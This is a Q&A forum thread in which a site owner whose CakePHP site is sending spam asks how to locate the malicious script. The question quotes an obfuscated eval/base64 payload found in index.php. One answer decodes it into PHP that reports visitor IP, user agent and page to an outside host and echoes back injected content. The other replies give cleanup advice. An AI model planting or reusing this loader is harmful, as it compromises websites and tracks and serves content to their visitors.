Site got hacked and it's sending more than 400 emails per day from my site

Question

Possible Duplicate:
My server's been hacked EMERGENCY

So basically my site got hacked and a script is sending more than 400 emails per day. I have more than 100 files on server, and is there any fast way to check, from which file exactly it is sending? I don't know when exactly script is sending the mails, so I can't be sure from which file it's called. Is there any easy way to find out from which file it's sent?

 eval(gzuncompress(base64_decode('eF6Nkw9rozAYxr+Kk6EGyuh2f+CQcFdW297h7BZ17ChDokbNNZpi4na70u9+0WvXdnfFA8Hk5fc8Sd4noZl1RoUg0joXiMj6BYB1zniMmbYt2Ns/vFSjUJB6lJNKQiFryRl/JrV1HvkOunfQwpwFwW0Uqlk0mjpeYD4CpZHXTc1muEoZgV7ouruSS6sl1HWbZpal3NRnHSwwMHPOc0ZMAKGWYSYIMIx/ci+44LwfizFNm36sFFU/xFekxv1YUtS8/I8TxLTK+ymBM1zTfi7m8gACa9XfbcKvOSHnZh440Wg8Riojxcq6IZphaG/BLtDZ3A/2GFgf5hdjQT6+j1KS8JRYJp6hYTLmT+7VZJmW9z/iqw8lfvgm3dJ7iv1Pv9LpZOi+84bfH+6aZFo8m0C7MD/TFTS1C2VJqs7m1EYVazTqoLi7gceSfQc6LOUlplWFS3LK+vBorSJrGFthWZzeyl3o+EEUoq9bRVKQZNniu65NnWBhMs6Xf1/8RA0jWtH2nb12D9ibjUrniNTOVJ/bZwLWnUY585U8ZgbXIXLnt0GEnCBEXoBGnj9x0OASdI9VNEzCL52a/CTJsRbY3Yp/qMXwEUJ9rreZ7iu6ptskKbi2K9qbzixhXJC3bpvNbzILaXQ='))); ?> 

This found in index.php file

My site is using cakePHP, so could it be there by default?

Answer 1

Be sure to read this topic. The best thing is to restore from backup. Also when you do this, try to find out how they got in. Your code is probably flawed so you will need to evaluate every single file by hand to find where your code insecure. Refer to OWASP for best practices in securing web applications.

Answer 2

Here, I unraveled the code for you:

if(!isset($sRetry)){
    global $sRetry;
    $sRetry=1;
    $sUserAgent=strtolower($_SERVER['HTTP_USER_AGENT']);
    $stCurlHandle=NULL;
    $stCurlLink="";

    if((strstr($sUserAgent,'google')== false)&&(strstr($sUserAgent,'yahoo')== false)&&(strstr($sUserAgent,'baidu')== false)&&(strstr($sUserAgent,'msn')== false)&&(strstr($sUserAgent,'opera')== false)&&(strstr($sUserAgent,'chrome')== false)&&(strstr($sUserAgent,'bing')== false)&&(strstr($sUserAgent,'safari')== false)&&(strstr($sUserAgent,'bot')== false)){if(isset($_SERVER['REMOTE_ADDR'])== true && isset($_SERVER['HTTP_HOST'])== true){
        $stCurlLink=base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw') .'ip=' .urlencode($_SERVER['REMOTE_ADDR']) .'&useragent=' .urlencode($sUserAgent) .'&domainname=' .urlencode($_SERVER['HTTP_HOST']) .'&fullpath=' .urlencode($_SERVER['REQUEST_URI']) .'&check=' .isset($_GET['look']);$stCurlHandle=curl_init($stCurlLink);}}if($stCurlHandle !== NULL){curl_setopt($stCurlHandle,CURLOPT_RETURNTRANSFER,1);$sResult=@curl_exec($stCurlHandle);if($sResult[0]=="O"){$sResult[0]=" ";echo $sResult;}curl_close($stCurlHandle);
        }
}

That $stCurlLink ends up becoming http://adveconfirm.com/stat/stat.php. I would recommend removing the code from the page and patching any vulnerabilities that you find. Take a look at your logs to see what pages were accessed by who and what data was sent.

Answer 3

You could also download all of the files using FTP, open them all with Notepad++ and search all the pages for "mail(". This should tell you where mail scripts are in your site. Also beware in case there is viruses that the hacker(s) added to your site.